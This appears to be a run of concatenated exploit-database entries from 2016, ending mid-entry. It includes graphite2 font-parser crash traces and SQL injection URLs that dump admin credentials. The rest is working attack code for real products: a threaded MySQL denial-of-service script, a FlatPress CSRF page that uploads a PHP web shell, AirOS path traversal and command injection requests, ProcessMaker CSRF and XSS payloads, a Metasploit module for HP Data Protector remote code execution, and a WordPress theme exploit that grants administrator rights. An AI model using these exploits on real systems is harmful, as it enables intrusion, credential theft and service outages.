#1 0x553bd3 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:16
#2 0x5516cb in unsigned short be::read<unsigned short>(unsigned char const*&) graphite/src/./inc/Endian.h:60:23
#3 0x59192b in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:157:24
#4 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12
#5 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)
#6 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)
#7 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*)
==1191==ABORTING
--- cut ---
--- cut ---
==1199==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001fb95 at pc 0x000000553c7d bp 0x7ffdebef2a70 sp 0x7ffdebef2a68
READ of size 1 at 0x61b00001fb95 thread T0
#0 0x553c7c in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73
#1 0x553bd3 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:16
#2 0x5516cb in unsigned short be::read<unsigned short>(unsigned char const*&) graphite/src/./inc/Endian.h:60:23
#3 0x59192b in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:157:24
#4 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12
#5 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)
#6 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)
#7 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)
AddressSanitizer can not describe address in more detail (wild memory access suspected).
SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*)
Shadow bytes around the buggy address:
0x0c367fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c367fffbf70: fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbfa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbfb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbfc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==1199==ABORTING
--- cut ---
--- cut ---
==1315==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400000db3a at pc 0x00000057d59d bp 0x7ffd01d33840 sp 0x7ffd01d33838
READ of size 2 at 0x60400000db3a thread T0
#0 0x57d59c in graphite2::_utf_codec<16>::get(unsigned short const*, signed char&) graphite/src/./inc/UtfCodec.h:97:27
#1 0x57d0a7 in graphite2::_utf_iterator<unsigned short const>::reference::operator unsigned int() const graphite/src/./inc/UtfCodec.h:173:74
#2 0x591d32 in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:173:18
#3 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12
#4 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)
#5 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)
#6 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)
0x60400000db3a is located 0 bytes to the right of 42-byte region [0x60400000db10,0x60400000db3a)
allocated by thread T0 here:
#0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x55a24a in unsigned short* graphite2::gralloc<unsigned short>(unsigned long) graphite/src/./inc/Main.h:88:28
#2 0x5916ef in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:147:37
#3 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12
#4 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)
#5 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)
#6 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)
SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/UtfCodec.h:97:27 in graphite2::_utf_codec<16>::get(unsigned short const*, signed char&)
Shadow bytes around the buggy address:
0x0c087fff9b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff9b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff9b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff9b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff9b50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c087fff9b60: fa fa 00 00 00 00 00[02]fa fa fd fd fd fd fd fd
0x0c087fff9b70: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd
0x0c087fff9b80: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 00
0x0c087fff9b90: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fa
0x0c087fff9ba0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa
0x0c087fff9bb0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==1315==ABORTING
--- cut ---
The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1254497. Attached are three font files which reproduce the crashes.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39863.zip
# Exploit Title: Property Agent RealeState Script Sql Injection
# Date: 2015-05-27
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage:
http://www.phpscriptsmall.com/product/php-realestate-script/
# Version: 4.9.0
Exploit :
http://server/[path]/single.php?view_id=-99999+[SQl+Command]
Test :
http://server/single.php?view_id=-57+/*!50000union*/+select+1,2,user_name,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+admin_login
Admin Panel : http://server/admin/
Username : admin
Password : inetsol
#!/usr/bin/env python
# Title: MySQL Procedure Analyse DoS Exploit
# Author: Osanda Malith Jayathissa (@OsandaMalith)
# E-Mail: osanda[cat]unseen.is
# Version: Vulnerable upto MySQL 5.5.45
# Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-4870/
# This exploit is compatible with both Python 3.x and 2.x
# CVE: CVE-2015-4870
from __future__ import print_function
import threading
import time
import sys
import os
try:
import urllib.request as urllib2
import urllib.parse as urllib
except ImportError:
import urllib2
import urllib
try: input = raw_input
except NameError: pass
host = "http://host/xxx.php?id=1'"
payload = " procedure analyse((select*from(select 1)x),1)-- -"
payload = urllib.quote(payload)
url = host + payload
req = urllib2.Request(url)
req.add_header('Accept', '*/*')
req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0')
#req.add_header('Cookie', 'security=low; PHPSESSID=uegfnidhcdicvlsrc0uesio455')
req.add_header('Connection', '')
req.add_header('Content-type', 'text/xml')
cls = lambda: os.system('cls') if os.name == 'nt' else os.system('clear')
class DoS(threading.Thread):
def run(self):
print("{0} started!".format(self.getName()))
for i in range(100):
urllib2.urlopen(req)
time.sleep(.2)
print("{0} finished!".format(self.getName()))
def banner():
print ('''
____ _____ __
/'\\_/`\\ /\\ _`\\ /\\ __`\\/\\ \\
/\\ \\ __ __\\ \\,\\L\\_\\ \\ \\/\\ \\ \\ \\
\\ \\ \\__\\ \\/\\ \\/\\ \\\\/_\\__ \\\\ \\ \\ \\ \\ \\ \\ __
\\ \\ \\_/\\ \\ \\ \\_\\ \\ /\\ \\L\\ \\ \\ \\\\'\\\\ \\ \\L\\ \\
\\ \\_\\\\ \\_\\/`____ \\\\ `\\____\\ \\___\\_\\ \\____/
\\/_/ \\/_/`/___/> \\\\/_____/\\/__//_/\\/___/
/\\___/
\\/__/
____ ____
/\\ _`\\ /\\ _`\\
\\ \\ \\/\\ \\ ___\\ \\,\\L\\_\\
\\ \\ \\ \\ \\ / __`\\/_\\__ \\
\\ \\ \\_\\ \\/\\ \\L\\ \\/\\ \\L\\ \\
\\ \\____/\\ \\____/\\ `\\____\\
\\/___/ \\/___/ \\/_____/
[*] Author: Osanda Malith Jayathissa (@OsandaMalith)
[*] E-Mail: osanda[cat]unseen.is
[*] Website: http://osandamalith.wordpress.com
[!] Author takes no responsibility of any damage you cause
[!] Strictly for Educational purposes only
''')
print("[*] Host: {0}".format(host))
input("\n\t[-] Press Return to launch the attack\n")
def _start():
try:
cls()
banner()
for i in range(10000):
thread = DoS(name = "[+] Thread-{0}".format(i + 1))
thread.start()
time.sleep(.1)
except KeyboardInterrupt:
print ('\n[!] Ctrl + C detected\n[!] Exiting')
sys.exit(0)
except EOFError:
print ('\n[!] Ctrl + D detected\n[!] Exiting')
sys.exit(0)
if __name__ == '__main__':
_start()
# Exploit Title: real-estate classified script Sql Injection
# Date: 2015-05-29
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage:
http://www.phpscriptsmall.com/product/open-source-real-estate-script/
# Version: 3.6.0
Exploit :
http://server/[path]/contact_view.php?contact=-99999+[SQl+Command]
Test :
http://server/contact_view.php?contact=-25527%27+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,10,13,14,15,16,17,18,19,20,username,22,password,24,25,26,27,28,29,30,31,32,33,34,35,36,37+/*!50000from*/+/*!50000admin_login*/%23
Admin Panel : http://server/admin/
<!DOCTYPE html>
<!--
FlatPress 1.0.3 CSRF Arbitrary File Upload
Vendor: Edoardo Vacchi
Product web page: http://www.flatpress.org
Affected version: 1.0.3
Summary: FlatPress is a blogging engine that saves your posts as
simple text files. Forget about SQL! You just need some PHP.
Desc: The vulnerability is caused due to the improper verification
of uploaded files via the Uploader script using 'upload[]' POST parameter
which allows of arbitrary files being uploaded in '/fp-content/attachs'
directory. The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform actions with
administrative privileges if a logged-in user visits a malicious
web site resulting in execution of arbitrary PHP code by uploading
a malicious PHP script file and execute system commands.
Tested on: Apache/2.4.10
PHP/5.6.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5328
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5328.php
04.04.2016
-->
<html>
<title>FlatPress 1.0.3 CSRF Arbitrary File Upload RCE PoC</title>
<body>
<script type="text/javascript">
function exec(){
var command = document.getElementById("exec");
var url = "http://localhost/flatpress/fp-content/attachs/test.php?cmd=";
var cmdexec = command.value;
window.open(url+cmdexec,"ZSL_iframe");
}
function upload(){
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/flatpress/admin.php?p=uploader&action=default", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundary1Ix0O1LgWmzQa0af");
xhr.withCredentials = true;
var body = "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"_wpnonce\"\r\n" +
"\r\n" +
"5a462c73ac\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n" +
"\r\n" +
"/flatpress/admin.php?p=uploader\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"test.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c?php\r\n" +
"system($_REQUEST[\'cmd\']);\r\n" +
"?\x3e\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload\"\r\n" +
"\r\n" +
"Upload\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<h3>FlatPress 1.0.3 CSRF Arbitrary File Upload RCE PoC Script</h3>
<form action="#">
<button type="button" onclick=upload()>Upload test.php file!</button>
</form><br />
<form action="javascript:exec()">
<input type="text" id="exec" placeholder="Enter a command">
<input type="submit" value="Execute!">
</form><br />
<iframe
style="border:2px;border-style:dashed;color:#d3d3d3"
srcdoc="command output frame"
width="700" height="600"
name="ZSL_iframe">
</iframe>
<br />
<font size="2" color="#d3d3d3">ZSL-2016-5328</font>
</body>
</html>
# AirOS NanoStation M2 v5.6-beta
# Arbitrary File Download & Remote Command Execution
# Tested on: XM.v5.6-beta5.24359.141008.1753 - Build: 2435
# Linux Awesome 2.6.32.63 #1 Wed Oct 8 17:54:30 EEST 2014 mips unknown
#
# Date: May 30, 2016
# Informer: Pablo Rebolini - <rebolini.pablo[x]gmail.com>
# Valid credentials are required !.
# Most of devices run default factory user/passwd combination (ubnt:ubnt)
# Take a look at /usr/www/scr.cgi
<?
include("lib/settings.inc");
include("lib/system.inc");
$filename = $fname + ".sh";
$file = $fname + $status;
header("Content-Type: application/force-download");
header("Content-Disposition: attachment; filename=" + $filename);
passthru("cat /tmp/persistent/$file");
exit;
# Arbitrary File Download
# Poc:
GET http://x.x.x.x/scr.cgi?fname=../../../../../etc/passwd%00&status=
Raw Response: dWJudDpWdnB2Q3doY2NGdjZROjA6MDpBZG1pbmlzdHJhdG9yOi9ldGMvcGVyc2lzdGVudDovYmluL3NoCm1jdXNlcjohVnZERThDMkVCMTowOjA6Oi9ldGMvcGVyc2lzdGVudC9tY3VzZXI6L2Jpbi9zaAo=
Base64 Decoded: ubnt:VvpvCwhccFv6Q:0:0:Administrator:/etc/persistent:/bin/sh
mcuser:!VvDE8C2EB1:0:0::/etc/persistent/mcuser:/bin/sh
# Remote Command Execution:
# Poc:
GET http://x.x.x.x/scr.cgi?fname=rc.poststart.sh;cat%20/etc/hosts%00&status=
Raw Response: MTI3LjAuMC4xCWxvY2FsaG9zdC5sb2NhbGRvbWFpbglsb2NhbGhvc3QK
Base64 Decoded: 127.0.0.1 localhost.localdomain localhost
######################################################################
# Exploit Title: ProcessMaker v3.0.1.7 Multiple vulnerabilities
# Date: 31/05/2016
# Author: Mickael Dorigny @ information-security.fr
# Vendor or Software Link: http://www.processmaker.com/
# Version: 3.0.1.7
# Category: Multiple Vulnerabilities
######################################################################
ProcessMaker description :
======================================================================
ProcessMaker Inc. is the developer of the ProcessMaker Workflow & BPM Software Suite. ProcessMaker automates form based, approval driven workflow that improves the way information flows between data and systems. ProcessMaker has been downloaded more than 750,000 times and is currently being used by thousands of companies around the world. ProcessMaker has a network of more than 35 partners located on 5 different continents.
Vulnerabilities description :
======================================================================
ProcessMaker v3.0.1.7 is vulnerable to multiple vulnerabilities like :
- Reflected XSS
- Stored XSS
- CSRF (x2)
PoC n°1 - CSRF on Designer Project Creation
======================================================================
Designer Project creation process is vulnerable to CSRF vulnerability. a forged request can be used to force an authentified user with designer project creation rights to create a new Designer project.
PoC:
[REQUEST]
http://server/sysworkflow/en/neoclassic/processProxy/saveProcess?type=bpmnProject
[POSTDATA]
PRO_TITLE=AAA&PRO_DESCRIPTION=BBB&PRO_CATEGORY=
The following HTML form can be used to exploit this CSRF vulnerability when mixed to phishing technics or auto-submit javascript tricks :
<form method=POST name=form1 action="http://serversysworkflow/en/neoclassic/processProxy/saveProcess?type=bpmnProject">
<input type=text name=PRO_TITLE value=XXX>
<input type=text name=PRO_DESCRIPTION value=XXX>
<input type=text name=PRO_CATEGORY value="">
<input type=submit>
</form>
<script>
window.onload = function(){
document.forms['form1'].submit()
}
</script>
Note that this CSRF vulnerability can be combined with the PoC n°3 that expose a stored XSS vulnerability in the Description input of Designer Project.
Proof of Concept n°2 - CSRF on group creation
======================================================================
Group creation process is vulnerable to CSRF vulnerability, a forged request can be used to force an authentified user with admin rights to create a new group.
PoC :
[REQUEST]
http://server/sysworkflow/en/neoclassic/groups/groups_Ajax?action=saveNewGroup
[POSTDATA]
name=swdcs&status=1
The following HTML form can be used to exploit this CSRF vulnerability when mixed to phishing technics or auto-submit javascript tricks :
<form method=POST name=form1 action="http://192.168.1.14/sysworkflow/en/neoclassic/groups/groups_Ajax?action=saveNewGroup">
<input type=text name=name value=2>
<input type=text name=status value=1>
<input type=submit>
</form>
<script>
window.onload = function(){
document.forms['form1'].submit()
}
</script>
Proof of Concept n°3 - Stored XSS on Designer Project Creation
======================================================================
The "description" input of the designer project creation process is vulnerable to stored XSS. A user can use this input to store an XSS an make other user's browsers executes controlled JavaScript instructions.
PoC
[REQUEST]
http://server/sysworkflow/en/neoclassic/processProxy/saveProcess?type=bpmnProject
[POSTDATA]
PRO_TITLE=AA<img src=x onerror=alert(1)>A&PRO_DESCRIPTION=BBB&PRO_CATEGORY=
Note that this CSRF vulnerability can be combined with the PoC n°1 that expose a CSRF vulnerability in the Designer Project creation process.
Through this vulnerability, an attacker could tamper with page rendering or redirect victim to fake login page
Proof of Concept n°4 - Reflected Cross-Site Scripting (RXSS) with authentication :
======================================================================
The search form in the Design Project can redirect user to a blank page without HTML code. This page display some information including user request. We can use this situation to execute JavaScript instruction into browser's user.
Note that a search request use POST transmission method, to exploit this vulnerability, an attacker need to trap a user to visit a HTML form with auto-submit Javascript tricks to generate the forged request.
PoC :
[REQUEST]
http://server/sysworkflow/en/neoclassic/processes/processesList
[POSTDATA]
processName=<img src=x onerror=alert(1);>&start=0&limit=25&category=%3Creset%3E
Through this vulnerability, an attacker could tamper with page rendering or redirect victim to fake login page.
Solution:
======================================================================
- Update your Process Manager installation to superior version
Additional resources :
======================================================================
- https://www.youtube.com/watch?v=TO2Fu-pbLI8
- http://www.processmaker.com/
Report timeline :
======================================================================
2016-01-26 : Editor informed for vulnerabilities
2016-01-27 : Editor response, fixes will be part of the next release
2016-05-25 : 3.0.1.8 is released with vulnerabilities corrections
2016-05-31 : Advisory release
Credits :
======================================================================
Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr
My Packet Storm Security profile : https://packetstormsecurity.com/files/author/12112/
--
SYNETIS
CONTACT: www.synetis.com | www.information-security.fr
# Exploit Title: CCextractor 0.80 Access Violation Crash
# Date: 31st May 2016
# Exploit Author: David Silveiro (Xino.co.uk)
# Vendor Homepage: http://www.ccextractor.org/
# Software Link: http://www.ccextractor.org/download-ccextractor.html
# Version: 0.80
# Tested on: Ubuntu 14 LTS
# CVE : 0 day
from subprocess import call
from shlex import split
from time import sleep
def crash():
command = './ccextractor crash'
buffer = '\x00\x00\x00\x04ssixssixs'
with open('crash', 'w+b') as file:
file.write(buffer)
try:
call(split(command))
print("Exploit successful! ")
except:
print("Error: Something has gone wrong!")
def main():
print("Author: David Silveiro ")
print(" CCextractor 0.80 Access Violation Crash ")
sleep(2)
crash()
if __name__ == "__main__":
main()
# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
require 'openssl'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => "HP Data Protector Encrypted Communication Remote Command Execution",
'Description' => %q{
This module exploits a well known remote code exection exploit after establishing encrypted control communications with a Data Protector agent. This allows exploitation of Data Protector agents that have been configured to only use encrypted control communications. This exploit works by executing the payload with Microsoft PowerShell so will only work against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows Server 2008 R2."
},
'License' => MSF_LICENSE,
'Author' => [ 'Ian Lovering' ],
'References' =>
[
[ 'CVE', '2016-2004' ],
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'WfsDelay' => 30,
'RPORT' => 5555
},
'Privileged' => false,
'DisclosureDate' => "Apr 18 2016",
'DefaultTarget' => 0))
end
def check
# For the check command
connect
sock.put(rand_text_alpha_upper(64))
response = sock.get_once(-1)
disconnect
if response.nil?
return Exploit::CheckCode::Safe
end
service_version = Rex::Text.to_ascii(response).chop.chomp
if service_version =~ /HP Data Protector/
print_status(service_version)
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def generate_dp_payload
command = cmd_psh_payload(
payload.encoded,
payload_instance.arch.first,
{ remove_comspec: true, encode_final_payload: true })
payload =
"\x32\x00\x01\x01\x01\x01\x01\x01" +
"\x00\x01\x00\x01\x00\x01\x00\x01" +
"\x01\x00\x20\x32\x38\x00\x5c\x70" +
"\x65\x72\x6c\x2e\x65\x78\x65\x00" +
"\x20\x2d\x65\x73\x79\x73\x74\x65" +
"\x6d('#{command}')\x00"
payload_length = [payload.length].pack('N')
return payload_length + payload
end
def exploit
# Main function
encryption_init_data =
"\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00" +
"\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00" +
"\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00" +
"\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00" +
"\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00"
print_status("Initiating connection")
# Open connection
connect
# Send init data
sock.put(encryption_init_data)
begin
buf = sock.get_once
rescue ::EOFError
end
print_status("Establishing encrypted channel")
# Create TLS / SSL context
sock.extend(Rex::Socket::SslTcp)
sock.sslctx = OpenSSL::SSL::SSLContext.new(:SSLv23)
sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
sock.sslctx.options = OpenSSL::SSL::OP_ALL
# Enable TLS / SSL
sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)
sock.sslsock.connect
print_status("Sending payload")
# Send payload
sock.put(generate_dp_payload(), {timeout: 5})
# Close socket
disconnect
print_status("Waiting for payload execution (this can take up to 30 seconds or so)")
end
end
<?php
/**
* Exploit Title: Newspaper WP Theme Expoit
* Google Dork:
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage: http://tagdiv.com/newspaper/
* Software Link: http://themeforest.net/item/newspaper/5489609
* Version: 6.7.1
* Tested on: Debian 8, PHP 5.6.17-3
* Type: WP Options Overwrite, Possible more
* Time line: Found [23-APR-2016], Vendor notified [23-APR-2016], Vendor fixed: [27-APR-2016], [RD:1]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:u:p:f:c:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
function exploit(){
global $curl, $options;
switch ($options['m']){
case "admin_on":
echo "Setting default role to Administrator \n";
$data = array('action'=>'td_ajax_update_panel', 'wp_option[default_role]'=>'administrator');
break;
case "admin_off":
echo "Setting default role to Subscriber \n";
$data = array('action'=>'td_ajax_update_panel', 'wp_option[default_role]'=>'subscriber');
break;
case "reg_on":
echo "Enabling registrations\n";
$data = array('action'=>'td_ajax_update_panel', 'wp_option[users_can_register]'=>'1');
break;
case "reg_on":
echo "Disabling registrations\n";
$data = array('action'=>'td_ajax_update_panel', 'wp_option[users_can_register]'=>'0');
break;
}
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
echo "Response: ". $resp."\n";
}
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if (!preg_match('~/$~',$options['t'])){
$options['t'] = $options['t'].'/';
}
if (!isset($options['m']) || !in_array($options['m'], array('admin_on','reg_on','admin_off','reg_off') ) ){
return false;
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
Newspaper WP Theme Exploit
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -m [MODE]
[TARGET_URL] http://localhost/wordpress/
[MODE] admin_on - Default admin level on reg. admin_off - Default subscriber on reg.
reg_on - Turns on user registration. reg_off - Turns off user registrations.
Trun on registrations, set default level to admin, register a user on the webiste,
turn off admin mode, turn off user registrations.
Examples:
php $argv[0] -t http://localhost/wordpress --tor=yes -m admin_on
[Register a new user as Admin]
php $argv[0] -t http://localhost/wordpress --tor=yes -m admin_off
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}
<?php
/**
* Exploit Titie: WP PRO Advertising System - All In One Ad Manager Exploit
* Google Dork:
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage: http://wordpress-advertising.com/
* Software Link: http://codecanyon.net/item/wp-pro-advertising-system-all-in-one-ad-manager/269693
* Version: 4.6.18
* Tested on: Debian 8, PHP 5.6.17-3
* Type: SQLi, Unserialize, File Delete.
* Time line: Found [06-May-2016], Vendor notified [06-May-2016], Vendor fixed: [???], [RD:1464914936]
